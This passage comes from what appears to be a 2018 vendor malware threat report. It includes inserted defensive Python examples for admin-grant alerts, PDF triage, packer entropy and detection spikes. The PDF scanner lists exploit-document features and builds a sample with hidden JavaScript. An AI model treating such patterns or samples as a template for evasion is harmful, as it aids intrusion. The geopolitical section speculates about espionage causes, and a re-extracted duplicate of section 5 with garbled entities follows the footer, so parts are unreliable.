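     "target": "jsmith", "group": None},
    {"time": "2018-06-04T10:30:00", "id": 4732, "subject": "CORP\\helpdesk",
     "target": "jsmith", "group": "Remote Desktop Users"},
]

# Groups whose membership grants administrative rights on the host (assumed list).
ADMIN_GROUPS = {"Administrators", "Domain Admins"}


def find_fast_admin_grants(events, window=timedelta(minutes=10)):
    """Return one finding per account whose creation (4720) is followed within
    `window` by an addition to an admin group (4732)."""
    created = {}   # account name (lower-cased) -> (created_at, creating subject)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO timestamps sort lexically
        t = datetime.fromisoformat(ev["time"])
        key = ev["target"].lower()
        if ev["id"] == 4720:
            created[key] = (t, ev["subject"])
        elif ev["id"] == 4732 and ev["group"] in ADMIN_GROUPS and key in created:
            created_at, creator = created[key]
            if t - created_at <= window:
                findings.append({"account": ev["target"], "created_by": creator,
                                 "created_at": created_at, "elevated_at": t,
                                 "elevated_by": ev["subject"], "group": ev["group"]})
    return findings


if __name__ == "__main__":
    for f in find_fast_admin_grants(SAMPLE_EVENTS):
        delay = (f["elevated_at"] - f["created_at"]).total_seconds()
        print(f"ALERT: {f['account']!r} created by {f['created_by']} and added to "
              f"{f['group']} {delay:.0f}s later by {f['elevated_by']}")
```

In production the same rule is usually paired with an allow-list of provisioning accounts and a check that the creating principal is itself expected to create users; a service account that both creates and elevates an account within seconds, as in the first pair of records, is the pattern worth paging on.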
5.2.4 Exploits
Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
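Because the bulk of Q2 exploit detections targeted PDF files, a defender's first triage step is a static look at which action-triggering and code-bearing names a file contains, before any reader opens it. The following Python is an added example, not Comodo's detection engine: the PDF bytes are constructed in memory, and the name list and verdict rules are assumptions a practitioner would tune. It handles two evasions that defeat a naive string search, names hidden behind PDF hex-escapes and names inside FlateDecode-compressed streams.

```python
"""Static triage of a PDF for features exploit documents commonly rely on:
auto-run actions plus embedded JavaScript, launch or rich-media objects,
including names hidden behind #xx hex-escapes and inside compressed streams.
Added example, not Comodo's detection engine; the sample PDFs below are
constructed and are not real exploit documents."""
import re
import zlib

# Name objects worth counting before a PDF is opened (assumed list).
# /OpenAction and /AA make something run automatically; the rest is what runs.
RISKY_NAMES = ["/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
               "/EmbeddedFile", "/RichMedia"]
AUTO_RUN = {"/OpenAction", "/AA"}
PAYLOAD = {"/JavaScript", "/JS", "/Launch", "/RichMedia", "/EmbeddedFile"}


def normalise_names(data: bytes) -> bytes:
    """Undo #xx hex-escapes so /Ja#76aScript reads as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes):
    """Return the content of every stream that inflates as a complete zlib
    stream, so names inside compressed objects are scanned as well."""
    inflated = []
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.S):
        d = zlib.decompressobj()
        try:
            out = d.decompress(m.group(1))
        except zlib.error:
            continue          # not Flate-compressed, or damaged: skip it
        if d.eof:             # only trust streams that terminated properly
            inflated.append(out)
    return inflated


def count_risky_names(data: bytes) -> dict:
    """Count each risky name across the raw bytes and all inflated streams."""
    blobs = [normalise_names(data)] + [normalise_names(s) for s in inflate_streams(data)]
    counts = {}
    for name in RISKY_NAMES:
        # A name ends at a delimiter, so /JS must not also match /JSFoo.
        pat = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        n = sum(len(re.findall(pat, b)) for b in blobs)
        if n:
            counts[name] = n
    return counts


def triage(data: bytes) -> dict:
    """'suspicious' when an auto-run trigger and a payload type co-occur,
    'review' when only payload types are present, otherwise 'clean'."""
    counts = count_risky_names(data)
    auto = any(n in AUTO_RUN for n in counts)
    payload = any(n in PAYLOAD for n in counts)
    verdict = "suspicious" if (auto and payload) else ("review" if payload else "clean")
    return {"verdict": verdict, "counts": counts}


# Constructed sample (hypothetical): an /OpenAction pointing at a hex-escaped
# JavaScript action whose code sits in a Flate-compressed stream.
_hidden = zlib.compress(b"<< /S /JavaScript /JS (app.alert(1)) >>")
_stream_obj = (b"3 0 obj << /Length " + str(len(_hidden)).encode()
               + b" /Filter /FlateDecode >>\nstream\n" + _hidden
               + b"\nendstream\nendobj\n")
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
              b"2 0 obj << /S /Ja#76aScript /JS 3 0 R >> endobj\n"
              + _stream_obj + b"%%EOF\n")
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
    print(triage(BENIGN_PDF))
```

This is a triage filter, not a verdict: PDFs can also carry encrypted strings and object streams (/ObjStm) that this does not unpack, so a "clean" result means only that none of the listed names was visible, and files that score "suspicious" belong in a sandbox or a full parser rather than a user's reader.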
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
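Packers such as UPX leave two tell-tales that a scanner can check without running the file: the section names the stub writes into the PE header, and the near-random byte distribution of the section holding the compressed payload. The example below is added here and is neither Comodo's detection nor UPX's own code: the section-table parser follows the documented PE/COFF layout, while the two PE images are constructed in memory and the 7.0 bits-per-byte cut-off is an assumed threshold.

```python
"""Detect likely packed PE files from the section table: UPX-style section
names and high Shannon entropy of a section's raw data, which is what a
compressed or encrypted payload looks like before the unpacking stub runs.
Added example, not Comodo's detection; pe_sections() reads real PE headers,
but both images below are constructed in memory and are not real binaries."""
import hashlib
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniformly random)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Parse the COFF section table; returns [(name, raw_bytes), ...]."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", image, coff + 2)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]     # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packed_sections(image: bytes, threshold: float = 7.0):
    """Return [(name, entropy)] for sections that look packed: a UPX-style
    name, or raw data at or above `threshold` bits per byte."""
    flagged = []
    for name, raw in pe_sections(image):
        ent = round(shannon_entropy(raw), 2)
        if name.upper().startswith("UPX") or ent >= threshold:
            flagged.append((name, ent))
    return flagged


# ---- constructed test images (hypothetical, built here for the demo) ----
def _build_pe(sections):
    """Minimal PE: DOS stub, PE signature, COFF header with an empty optional
    header, section table, raw section data at a 512-byte aligned offset."""
    e_lfanew = 0x40
    header_len = e_lfanew + 4 + 20 + 40 * len(sections)
    data_off = (header_len + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table, blob = b"", b""
    for name, raw in sections:
        table += (name.encode().ljust(8, b"\0")
                  + struct.pack("<IIII", len(raw), 0x1000, len(raw), data_off + len(blob))
                  + b"\0" * 12 + struct.pack("<I", 0x60000020))
        blob += raw
    return (dos + b"PE\0\0" + coff + table).ljust(data_off, b"\0") + blob


def _pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy bytes (a SHA-256 chain) standing in for a
    compressed payload."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


PACKED_IMAGE = _build_pe([("UPX0", b""), ("UPX1", _pseudo_random(4096)),
                          (".rsrc", b"\0" * 512)])
PLAIN_IMAGE = _build_pe([(".text", b"\x90" * 2000 + b"Hello, world!\0" * 50),
                         (".data", b"\0" * 256)])

if __name__ == "__main__":
    for label, img in (("packed", PACKED_IMAGE), ("plain", PLAIN_IMAGE)):
        print(label, packed_sections(img))
```

Section names are trivially renamed by a modified packer such as the MUPX the report describes, which is why the entropy check matters more than the name check; conversely, legitimately signed installers and resource-heavy binaries also carry high-entropy sections, so a hit is a reason to unpack and look further, not a conviction on its own.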
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. Such software includes free toolbars, adware, and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
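Every timeline in this section is read the same way: a day whose detection count stands out against the surrounding baseline, sometimes "well over ten times" the usual level. The Python below is an added example, not Comodo's analytics, of making that judgment reproducible with a robust median/MAD baseline, so that the spike being measured does not inflate the reference level the way a mean and standard deviation would. The daily counts are constructed and do not reproduce the report's data; the z-score threshold is an assumed tuning value.

```python
"""Flag anomalous days in a daily detection-count series with a robust
median/MAD baseline, the check behind "this spike stands out" in the
timelines above. Added example, not Comodo's analytics; the counts are
constructed and do not reproduce the report's data."""
from statistics import median

# Constructed daily counts (hypothetical): a quiet baseline around 50 with
# a ten-fold spike on day 12 and a smaller doubling on day 20.
SAMPLE_COUNTS = [52, 48, 55, 50, 47, 53, 49, 51, 54, 50, 46, 52,
                 540, 51, 49, 53, 48, 50, 52, 47, 95, 50, 49, 51]


def robust_zscores(counts):
    """(x - median) / (1.4826 * MAD). The 1.4826 factor makes MAD comparable
    to a standard deviation for normal data; unlike a mean/stddev z-score,
    the baseline is not dragged upward by the very spike being measured."""
    med = median(counts)
    mad = median([abs(c - med) for c in counts]) or 1.0  # guard: flat series
    return [(c - med) / (1.4826 * mad) for c in counts]


def find_spikes(counts, threshold=5.0):
    """Return (day_index, count, robust_z, ratio_to_median) for each day whose
    robust z-score reaches `threshold`, strongest spike first."""
    med = median(counts)
    spikes = [(i, c, round(z, 1), round(c / med, 1))
              for i, (c, z) in enumerate(zip(counts, robust_zscores(counts)))
              if z >= threshold]
    return sorted(spikes, key=lambda s: s[2], reverse=True)


if __name__ == "__main__":
    for day, count, z, ratio in find_spikes(SAMPLE_COUNTS):
        print(f"day {day}: {count} detections, {ratio}x the median (robust z={z})")
```

With a plain mean and standard deviation the 540-count day would pull the mean to about 71 and the standard deviation to about 100, so the day itself would score only around z = 4.7 and the 95-count day would vanish into the noise; the median/MAD baseline stays at the quiet level and ranks both. The threshold of 5 is deliberately conservative for short series; it should be re-tuned once weekly seasonality is modelled, since a Monday bump is not an event.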
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.
VISIT COMODO.COM
NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
